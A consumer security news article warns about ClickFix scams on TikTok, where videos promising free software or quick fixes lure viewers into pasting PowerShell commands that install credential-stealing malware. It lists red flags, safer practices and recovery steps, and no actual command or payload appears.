Short videos offering a free Photoshop unlock, a speedier run of Spotify, or a fix for a “slight Windows error” are making the rounds on TikTok. The routine is always the same: open a system tool, paste a code snippet in, and watch the magic. That “magic” is malware. And if a tech tip says you need to paste code, believe me: it’s a scam.
Threat actors are taking advantage of the platform’s reach to distribute information-stealing malware via a social engineering method called ClickFix, security researchers say. The idea here is to ransom your own device, no phishing link necessary.
How the ClickFix scam reels you in with fake fixes
Creators upload a flashy how-to with thousands of likes and chummy directions. They tell you to run PowerShell “as Administrator” and then paste in a single command that’s supposed to enable paid software or increase performance. It looks simple and harmless.
Under the hood, that one-liner downloads and runs a payload—frequently disguised with an innocuous file name such as Updater.exe. In one analyzed case (one of which was shared by SANS Institute handler Xavier Mertens), the executable was AuroStealer, a credential-stealing Trojan, and the command also injected shellcode into memory in an attempt to bypass detection.
The trick works in part because the victim does much of the work. Copy-pasting a command lets you escape a ton of phishing defenses, elevate your privileges, and start running an interpreter you trust to go and plant malware.
What the data shows about the rise of ClickFix scams
An investigation led by the SANS Internet Storm Center revealed a surge in short-form videos featuring ClickFix for delivery of info-stealers and remote access tools. Trend Micro has identified TikTok users uploading “life hack” clips on how to run PowerShell commands that use Vidar and StealC.
The effectiveness of this is reinforced by Microsoft’s recently published Digital Defense report. The firm saw ClickFix-style tactics as the origin of a significant portion of initial access incidents, with 47% attributed to them (more than classic phishing and password spray attacks).
Why the surge? Social platforms offer immediate distribution at record scale. Threat actors don’t have to build infrastructure or even maintain booby-trapped sites when the algorithm is shoveling out their pitch directly into millions of timelines.
Why Pasting Commands Is a Huge Security Risk
PowerShell and the like are powerful AF. One command can download a file, alter system settings, turn off protections, and run code in memory. Attackers frequently include flags to obscure the window, circumvent execution policy, and execute encoded payloads that appear unintelligible to an untrained observer.
Since the code you use executes on your account, frequently with Administrator rights, tools at your endpoints will probably consider this legitimate traffic. Some payloads are “fileless,” making them more difficult to catch with traditional antivirus. The end result: stolen passwords, emptied crypto wallets, exfiltrated browser cookies, or a backdoor for later ransomware deployment.
Red flags to spot and safer solutions to avoid malware
Any video that tells you to run commands on your own machine should be met with an air of “What are you playing at?”—especially if it’s suggesting you do so as an Administrator. Watch for these red flags:
- Claims that paid software can be activated “for free.”
- Advice promising to supercharge streaming services or “clean” Windows with one click.
- Instructions to open PowerShell or another system tool and paste in a command.
If you require a software repair, stick to trustworthy sources and protections:
- Use official documentation from the software maker or credible IT resources.
- Download installers only from the developer’s site or trusted app stores.
- Enable Microsoft Defender, SmartScreen, and automatic updates.
- Work from a standard (non-administrator) account whenever possible.
Creators and viewers should also keep in mind that “likes” and comments are not vetting. Engagement can be conjured out of thin air and is not the same as safety. Treat code like medication: never accept it from a stranger on the internet.
If you’ve already pasted the code, here’s what to do
- If available, perform a full-system scan using trustworthy security software and add an offline scan. Look for unknown startup items, scheduled tasks, and browser extensions, removing anything that seems too strange.
- Assume credential theft. Change the passwords for your email account and any financial accounts, as well as your cloud-based services, from a clean device with multifactor authentication. Rotate browser-saved passwords and expire all active sessions in suspected info-stealer cases.
- If your work involves sensitive data or the system behaves erratically, back up files and do a clean reinstall. If you’re in the app, report the video and let impacted contacts or your workplace IT team know to help prevent potential lateral movement.
The bottom line is simple. A real tip never makes you paste a black-magic one-liner. If you are told to open PowerShell and run code from a TikTok how-to, close the app and keep your system—and you—out of a criminal’s hands.